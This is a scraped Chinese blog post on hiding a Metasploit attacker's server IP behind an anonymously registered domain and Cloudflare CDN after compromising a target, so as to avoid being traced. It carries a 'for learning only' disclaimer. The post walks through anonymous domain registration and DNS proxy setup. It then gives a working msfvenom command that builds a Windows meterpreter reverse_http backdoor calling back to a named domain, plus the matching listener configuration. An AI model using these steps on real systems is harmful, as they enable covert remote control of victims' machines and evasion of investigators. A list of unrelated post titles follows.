当前位置:网站首页>Metasploit-域名上线隐藏IP
Metasploit-域名上线隐藏IP
2022-08-04 23:49:00 【曲折上升】
仅供学习使用,请勿用于非法途径,后果自负
Metasploit域名上线隐藏IP
概述
为什么要隐藏IP?
在拿下了目标机之后,目标机在内网里面,使用msf或者CS时,用自己的VPS做服务器的话,导致很容易被溯源。
域名上线原理
当我们访问域名时会经过域名解析 域名解析就是域名到IP地址的转换过程,那么就意味这我们访问域名实际上最后是访问的真实IP。
A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录。
CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名。
MX记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置MX记录。建立邮箱时,一般会根据邮箱服务商提供的MX记录填写此记录。
NS记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置NS记录。
TXT记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做SPF(反垃圾邮件)记录。
AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA记录。
通过CDN上线MSF
CDN的全称是Content Delivery Network,即内容分发网络。其目的是通过在现有的Internet中增加一层新的CACHE(缓存)层,将网站的内容发布到最接近用户的网络”边缘“的节点,目的提高用户访问网站的速度。

CDN上线具体实现
基础配置:一台VPS、一个域名,这里的VPS最好是匿名的
既然是隐藏自身 那么域名肯定不能使用自己备案的域名
https://freenom.com/ 注册免费域名 注册失败,可以用gmail注册
https://cart.godaddy.com/ 注册匿名域名
https://www.cloudflare.com/ 免费CDN
购买好域名之后,进入cloudflare.com添加域名。

添加A记录。

返回https://cart.godaddy.com/进行入门指南的设置。



将所有的开关都关闭。编辑名称服务器,设置为cloudflare.com的名称服务器。
点击改变



检查是否配置成功。
ping下该域名,查看是否为vps的IP地址,不是的话则配置成功。

配置成功。
- MSF生成木马
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=www.zsyyme.info LPORT=2095 -f exe -o shell.exe

- MSF开启相对应监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost www.zsyyme.info
set lport 2095
run


- 用wireshark抓取流量即可!
边栏推荐
- LeetCode Hot 100
- 美团二面:Redis与MySQL双写一致性如何保证?
- 3. Actual combat---crawl the result page corresponding to Baidu's specified entry (a simple page collector)
- uniapp 分享功能-分享给朋友群聊朋友圈效果(整理)
- what is MVCC
- 情侣牵手[贪心 & 抽象]
- 中日颜色风格
- 【LeetCode】滑动窗口题解汇总
- After another 3 days, I have sorted out 90 NumPy examples, and I can't help but bookmark it!
- ClickHouse 二级索引
猜你喜欢

The market value of 360 has evaporated by 390 billion in four years. Can government and enterprise security save lives?

小黑leetcode之旅:95. 至少有 K 个重复字符的最长子串

Ab3d.PowerToys and Ab3d.DXEngine Crack

基于深度学习的路面坑洞检测(详细教程)

Pytorch分布式训练/多卡/多GPU训练DDP的torch.distributed.launch和torchrun

OpenCV:10特征检测

Day118.尚医通:订单列表、详情、支付

Flutter启动流程(Skia引擎)介绍与使用
![[CVA Valuation Training Camp] Financial Modeling Guide - Lecture 1](/img/8b/360df9a9094037dc358cb21c60cdc8.png)
[CVA Valuation Training Camp] Financial Modeling Guide - Lecture 1

建模师经验分享:模型学习方法
随机推荐
Ab3d.PowerToys and Ab3d.DXEngine Crack
手写分布式配置中心(1)
Detailed explanation of common DNS resource record types
头脑风暴:完全背包
uniapp横向选项卡(水平滚动导航栏)效果demo(整理)
.net (C#) get year month day between two dates
node中package解析、npm 命令行npm详解,node中的common模块化,npm、nrm两种方式查看源和切换镜像
统计单词(DAY 101)华中科技大学考研机试题
The role of the annotation @ EnableAutoConfiguration and how to use
npm基本操作及命令详解
Ab3d.PowerToys and Ab3d.DXEngine Crack
uniapp sharing function - share to friends group chat circle of friends effect (sorting)
App测试和Web测试的区别
对写作的一些感悟
SQL association table update
MySQL的安装与卸载
4 - "PyTorch Deep Learning Practice" - Backpropagation
Statistical words (DAY 101) Huazhong University of Science and Technology postgraduate examination questions
Some thoughts on writing
The role of @ Import annotations as well as how to use